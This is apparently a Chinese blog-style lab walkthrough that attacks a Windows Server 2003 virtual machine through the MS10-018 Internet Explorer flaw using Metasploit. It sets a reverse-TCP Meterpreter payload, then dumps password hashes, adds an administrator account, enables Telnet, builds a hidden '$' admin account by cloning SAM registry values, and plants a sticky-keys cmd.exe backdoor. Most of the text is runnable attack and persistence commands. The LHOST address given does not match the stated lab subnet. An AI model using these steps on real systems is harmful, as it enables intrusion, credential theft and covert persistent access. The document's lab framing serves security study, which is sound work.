利用Windows系统的漏洞-MS10-018漏洞的利用

MS10-018 攻击流程原理

  1. 攻击者(Kali) 用 Metasploit 生成 恶意网页链接

  2. 诱导受害者 让 Windows 2003 用 IE6/7/8 打开链接。

  3. 漏洞触发 IE 解析网页 → 触发漏洞 → 执行攻击者代码

  4. 反弹连接 目标主机主动连接 Kali → 建立 Meterpreter 控制会话

  5. 完全控制抓密码 Hash、添加管理员账户、开 Telnet、开远程桌面。

参考: Windows权限维持之隐藏账户 - 知乎

一、实验环境准备

  1. 虚拟机软件:VMware Workstation
  2. 攻击机:Kali Linux 2020(IP:192.168.118.88)
  3. 靶机:Windows Server 2003(IP:192.168.118.103)
  4. 网络配置:两台虚拟机设置为nat,确保互通

kali关闭防火墙

复制代码
sudo iptables -F          # 清空 filter 表规则
sudo iptables -X          # 删除自定义链
sudo iptables -t nat -F    # 清空 nat 表
sudo iptables -t nat -X

sudo iptables -P INPUT ACCEPT
sudo iptables -P FORWARD ACCEPT
sudo iptables -P OUTPUT ACCEPT

二、MS10-018 IE 浏览器漏洞利用完整步骤

(一)攻击机(Kali)操作

  1. 启动 Metasploit 打开终端,执行:

    复制代码
    msfconsole

2.搜索 MS10-018 漏洞模块

复制代码
search ms10_018

3. 加载漏洞利用模块

复制代码
use exploit/windows/browser/ms10_018_ie_behaviors

4. 设置反弹 Payload

复制代码
set payload windows/meterpreter/reverse_tcp

5.查看需要配置的参数

复制代码
show options

6.设置攻击机 IP(WEB 服务器地址)

复制代码
set SRVHOST 192.168.118.88

7.设置反弹连接 IP

复制代码
  set LHOST 192.168.137.102
  • 设置恶意网页名称(可选)

    复制代码
    set URIPATH MS10_018
  • 注意:需要提前关闭 ie的安全增强设置

  • 还需要关闭 ie的安全配置 设置低级

  • 发起攻击,启动恶意服务器 (二)靶机(Win2003)操作打开IE 6/7/8 浏览器访问攻击机生成的链接:http://192.168.118.88:8080/MS10_018 http://192.168.118.88:8080/MS10_018

  1. 攻击机自动获取 Meterpreter 会话

(三)后渗透控制(攻击机)

  1. 查看已建立的会话

    复制代码
    sessions
  2. 进入会话

    复制代码
    sessions -i 2
  3. 获取系统密码 Hash

    复制代码
    hashdump
  4. 进入系统 CMD Shell

    复制代码
    shell
  5. 添加管理员账户

    复制代码
    net user hacker 123456 /add
    net localgroup administrators hacker /add
  6. 开启 Telnet 服务

复制代码
    sc config tlntsvr start= auto
    sc start tlntsvr

验证telnet后门服务


三、Windows Server 2003 隐藏后门账户完整步骤

步骤 1:创建带 $ 符号的隐藏用户

复制代码
net user hzq$ 123456 /add

步骤 2:加入管理员组

复制代码
net localgroup administrators hzq$ /add

步骤 3:打开注册表并赋予 SAM 权限

  1. 运行 regedit
  2. 定位:HKEY_LOCAL_MACHINE\SAM\SAM
  3. 右键 → 权限 → 给 Administrators 组完全控制
  4. 重启注册表,即可展开 SAM 子项

步骤 4:替换管理员权限配置(核心)

  1. 展开:SAM\Domains\Accounts\Users
  2. 找到管理员项:000001F4(RID=500)
  3. 复制右侧F 键值全部内容
  4. 找到新建用户项:000003F1()
  5. 用管理员 F 值覆盖 该用户 F 值

步骤 5:导出注册表项

  1. 导出 Names\hzq$ → 保存为 hzq$.reg
  2. 导出 Users\000003F0 → 保存为 3f0.reg

步骤 6:命令行删除用户

复制代码
net user hzq$ /del

步骤 7:重新导入注册表文件

双击导入 hzq$.reg3f0.reg

步骤 8:验证隐藏效果

  1. 执行 net user看不到 hzq$
  2. 远程桌面登录 hzq$成功进入管理员桌面

四、粘滞键 CMD 后门(sethc.exe)完整步骤

步骤 1:备份原系统文件

复制代码
cd C:\WINDOWS\system32
copy sethc.exe sethc.exe.bak

步骤 2:替换 sethc.exe 为 cmd.exe

复制代码
copy cmd.exe sethc.exe

步骤 3:测试后门

  1. 注销 Windows Server 2003
  2. 登录界面 连续按 5 次 Shift
  3. 直接弹出SYSTEM 权限 CMD 窗口
  4. 可执行添加账户、修改密码等任意操作
相关推荐
i建模12 小时前
在 Windows 中解决 `zig fetch` 的 `TlsInitializationFailed` 错误
windows·zig
问道飞鱼15 小时前
【Tauri框架学习】Windows 11 环境下 Tauri 开发环境安装与问题解决手册
windows·学习·tauri·开发环境
xiaoliuliu1234516 小时前
Autodesk官方卸载工具使用教程(Windows版,含解压+管理员运行+批量卸载)
windows
johnrui18 小时前
集合与树形结构
开发语言·windows
柯儿的天空19 小时前
【OpenClaw 全面解析:从零到精通】第 006 篇:OpenClaw 在 Windows/WSL2 上的安装与部署实战
人工智能·windows·语言模型·chatgpt·ai作画
阿昭L21 小时前
说说Windows进程的令牌(token)
windows·系统安全·token
包饭厅咸鱼1 天前
小龙虾openclaw----Windows+Wsl+Docker 安装openclaw 并接入飞书
windows·docker·openclaw·小龙虾
※※冰馨※※1 天前
【QT】TortoiseGit配 SSH 克隆 Codeup
开发语言·c++·windows
今夕资源网1 天前
坚果手机直连Windows,打开软件实现键鼠操作TNT系统 视频教程+所需软件(今夕存档)
windows·智能手机·tnt·smartisan·smartisan tnt·锤子系统·坚果手机